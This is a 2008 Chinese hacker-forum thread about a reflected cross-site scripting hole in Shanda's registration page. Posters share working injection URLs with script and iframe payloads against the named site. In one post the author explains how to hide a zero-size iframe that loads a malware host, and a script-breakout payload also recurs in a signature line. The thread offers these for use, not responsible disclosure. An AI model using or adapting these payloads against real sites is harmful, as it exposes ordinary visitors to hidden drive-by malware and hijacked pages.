‹‹ 上一主题 | 下一主题 ››
 12 12
发新话题
打印

[原创] 盛大,你也有XSS啊!!!找得我好容易啊!!!

背时鬼

"></script><&

三年级

Rank: 3Rank: 3Rank: 3

帖子
736 
精华
1 
威望
279 度 
金币
1509 枚 
来自
云南省昆明市中心 
最后登录
2008-12-2 
1# 发表于 2008-9-21 21:53  只看该作者

盛大,你也有XSS啊!!!找得我好容易啊!!!

它过滤了单引号:
提交测试语句:
http://register.sdo.com/sdo/reg/inputinfo1.asp?from=61&zone=">%3Cscript%3Ealert('"XSS"')%3C/script%3E<"
源文件:
<input type="hidden" id="txtRegisterZone" name="txtRegisterZone" value=""><script>alert("XSS")</script><"">

框架代码:
http://register.sdo.com/sdo/reg/inputinfo1.asp?from=61&zone="><iframe%20src=http://hh312623376.blog.163.com/%20width=900%20height=1200></iframe><"
本帖最近评分记录
  • bk7477890 威望 +8 大家一起跨盛大 2008-9-21 22:03
[img][/img]</textarea><Script>alert('text')< /Script><textarea>[img][/img]

TOP

bk7477890

XIAOYY

正式版主

Rank: 9Rank: 9Rank: 9

黑客X档案官方论坛

帖子
4542 
精华
1 
威望
106 度 
金币
9712 枚 
性别
男 
来自
西安 
最后登录
2008-12-2 
2# 发表于 2008-9-21 21:59  只看该作者
复制内容到剪贴板
代码:
http://register.sdo.com/sdo/reg/inputinfo1.asp?from=61&zone="><iframe%20src=http://bbs.hackerxfiles.net/?fromuid=5348/%20width=900%20height=1200></iframe><"

TOP

背时鬼

"></script><&

三年级

Rank: 3Rank: 3Rank: 3

帖子
736 
精华
1 
威望
279 度 
金币
1509 枚 
来自
云南省昆明市中心 
最后登录
2008-12-2 
3# 发表于 2008-9-21 21:59  只看该作者
大家不信的话登陆:http://register.sdo.com
就能看到我的XSS提示框.我没折啊~写入数据库了~我清不掉啊~
[img][/img]</textarea><Script>alert('text')< /Script><textarea>[img][/img]

TOP

bk7477890

XIAOYY

正式版主

Rank: 9Rank: 9Rank: 9

黑客X档案官方论坛

帖子
4542 
精华
1 
威望
106 度 
金币
9712 枚 
性别
男 
来自
西安 
最后登录
2008-12-2 
4# 发表于 2008-9-21 22:00  只看该作者
以后用
复制内容到剪贴板
代码:
~~~~~
的格式发

TOP

bk7477890

XIAOYY

正式版主

Rank: 9Rank: 9Rank: 9

黑客X档案官方论坛

帖子
4542 
精华
1 
威望
106 度 
金币
9712 枚 
性别
男 
来自
西安 
最后登录
2008-12-2 
5# 发表于 2008-9-21 22:02  只看该作者
没有写入到数据库啊

TOP

背时鬼

"></script><&

三年级

Rank: 3Rank: 3Rank: 3

帖子
736 
精华
1 
威望
279 度 
金币
1509 枚 
来自
云南省昆明市中心 
最后登录
2008-12-2 
6# 发表于 2008-9-21 22:06  只看该作者
是不是XSS会留下本地的COOKIE一段时间才失效~不懂~
[img][/img]</textarea><Script>alert('text')< /Script><textarea>[img][/img]

TOP

love521cjl

学前班

帖子
精华
0 
威望
0 度 
金币
24 枚 
性别
男 
最后登录
2008-9-22 
7# 发表于 2008-9-22 11:56  只看该作者
不懂怎么办???

TOP

卩灬螃蟹丿

学前班

帖子
33 
精华
0 
威望
6 度 
金币
122 枚 
最后登录
2008-12-2 
8# 发表于 2008-9-22 14:39  只看该作者
努力学习中

TOP

背时鬼

"></script><&

三年级

Rank: 3Rank: 3Rank: 3

帖子
736 
精华
1 
威望
279 度 
金币
1509 枚 
来自
云南省昆明市中心 
最后登录
2008-12-2 
9# 发表于 2008-9-22 17:13  只看该作者
<iframe%20src=http://hh312623376.blog.163.com/%20width=900%20height=1200></iframe>
http://hh312623376.blog.163.com 替换成你网马地址.width=900%20height=1200
改为width=0%20height=0
就是框架挂马了
[img][/img]</textarea><Script>alert('text')< /Script><textarea>[img][/img]

TOP

無情人生

一年级

Rank: 1

帖子
65 
精华
0 
威望
13 度 
金币
110 枚 
来自
点击显示 
最后登录
2008-11-25 
10# 发表于 2008-9-22 21:10  只看该作者
没看懂

TOP

‹‹ 上一主题 | 下一主题 ››
 12 12
发新话题

Processed in 0.030575 second(s), 6 queries, Gzip enabled